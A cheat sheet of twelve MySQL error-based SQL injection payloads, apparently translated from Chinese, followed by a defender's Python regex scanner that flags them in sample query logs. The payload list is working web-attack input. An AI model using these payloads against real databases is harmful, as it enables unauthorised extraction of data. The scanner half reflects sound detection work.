1. Error via floor()
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2. Error via ExtractValue()
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
3. Error via UpdateXml()
and 1=(updatexml(1,concat(0x3a,(select user())),1))
4. Error via NAME_CONST()
and exists(select * from (select * from(select name_const(version(),0))a join (select name_const(version(),0))b)c);
5. Error via join, to extract column names
Note: this method applies when the table name is already known; in the queries below, 表名 stands for that known table name.
select * from (select * from 表名 a join 表名 b) c
Once one column name has been obtained, use USING to get the next one (已知的字段 stands for a column already obtained):
select * from (select * from 表名 a join 表名 b using (已知的字段,已知的字段)) c
6. Error via exp()
and exp(~(select * from (select user() ) a) );
Note: due to MySQL version differences, I could not reproduce this method locally; the screenshot was taken from Baidu.
7. Error via GeometryCollection()
and geometrycollection((select * from(select * from(select user())a)b));
8. Error via polygon()
and polygon((select * from(select * from(select user())a)b));
9. Error via multipoint()
and multipoint((select * from(select * from(select user())a)b));
10. Error via multilinestring()
and multilinestring((select * from(select * from(select user())a)b));
11. Error via multipolygon()
and multipolygon((select * from(select * from(select user())a)b));
12. Error via linestring()
and linestring((select * from(select * from(select user())a)b));
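As an added defender-side example, not part of the original list: a small Python scanner that flags the function signatures catalogued above in MySQL general-log lines. The signature names and the sample log lines are constructed for this example; the fourth sample line is a legitimate spatial query that must not be flagged.

```python
import re

# Regexes for the error-based techniques listed above (names are constructed labels).
# The geometry-function rule requires a nested SELECT so that ordinary spatial
# calls such as polygon(linestring(point(...))) are not reported.
SIGNATURES = {
    "floor/rand group-by": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
    "exp overflow": re.compile(r"\bexp\s*\(\s*~", re.I),
    "geometry function": re.compile(
        r"\b(geometrycollection|polygon|multipoint|multilinestring|multipolygon|linestring)"
        r"\s*\(\s*\(?\s*select\b", re.I),
}


def classify(query):
    """Return the labels of every error-based signature found in one query string."""
    return [name for name, pat in SIGNATURES.items() if pat.search(query)]


def scan_log(lines):
    """Return (line_number, labels) for every log line that matches at least one signature."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            findings.append((n, hits))
    return findings


# Constructed sample lines in the style of the MySQL general log (not a real capture).
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z 12 Query SELECT id,name FROM products WHERE id=7",
    "2024-01-01T10:00:01Z 12 Query SELECT id,name FROM products WHERE id=7 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))",
    "2024-01-01T10:00:02Z 13 Query SELECT id FROM products WHERE id=7 and 1=(updatexml(1,concat(0x3a,(select user())),1))",
    "2024-01-01T10:00:03Z 13 Query SELECT ST_AsText(polygon(linestring(point(0,0),point(1,0),point(1,1),point(0,0)))) FROM geo",
    "2024-01-01T10:00:04Z 14 Query SELECT id FROM products WHERE id=7 and polygon((select * from(select * from(select user())a)b))",
    "2024-01-01T10:00:05Z 14 Query SELECT id FROM products WHERE id=7 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)",
]

if __name__ == "__main__":
    for line_no, labels in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(labels)}")
```

Matching on the function name plus the nested subquery keeps the rule narrow; pairing it with the server's own error log (these payloads only work because the server returns the error text) gives a second, independent signal.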